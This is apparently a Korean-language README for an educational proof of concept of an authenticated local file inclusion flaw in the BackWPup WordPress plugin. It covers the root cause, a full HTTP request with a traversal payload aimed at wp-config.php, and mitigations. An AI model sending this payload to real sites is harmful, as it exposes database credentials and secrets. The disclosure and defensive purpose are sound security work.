
# CVE-2026-6227 교육용 개념 증명 BackWPup WordPress 플러그인의 인증된 로컬 파일 포함(Local File Inclusion) 취약점에 대한 교육용 개념 증명으로, 근본 원인 분석, 익스플로잇 요청, 완화 지침을 포함합니다.
BackWPup 5.6.6 이하 버전은 /wp-json/backwpup/v1/getblock REST 엔드포인트의 block_name 파라미터를 통해 인증된 로컬 파일 포함(LFI) 취약점의 영향을 받습니다.
이 결함은 순회 시퀀스에 대한 비재귀적 str_replace() 샌니타이징으로 인해 발생했으며, 5.6.7 버전에서 이미 수정되었습니다.
이 저장소는 교육 및 윤리적 보안 연구 목적으로만 제공됩니다. 여기에 제공된 정보는 관리자와 보안 팀이 시스템을 검증하는 데 도움을 주기 위한 것입니다. 명시적인 서면 허가 없이 대상을 공격하는 데 사용하지 마십시오.
BackWPupHelpers::component()POST /wp-json/backwpup/v1/getblockblock_name취약한 컴포넌트 로더는 include()를 호출하기 전에 비재귀적 str_replace() 샌니타이징을 적용합니다. 이는 ....// 또는 ..././와 같은 조작된 순회 패턴을 사용하여 우회할 수 있으며, 공격자가 제어하는 경로 해석을 허용합니다.
wp-config.php)기본적으로 악용에는 관리자 수준의 접근 권한이 필요합니다. 백업 권한이 위임된 경우, 낮은 권한의 사용자도 이 문제를 악용할 수 있게 됩니다.
/wp-json/backwpup/v1/getblock에 대한 정상적인 POST 요청을 찾습니다.block_name을 순회 페이로드로 교체합니다.요청 예시:
POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
backwpup 권한 할당을 신뢰할 수 있는 역할로만 제한/wp-json/backwpup/v1/getblock에 대한 의심스러운 접근을 감사 로그에서 검토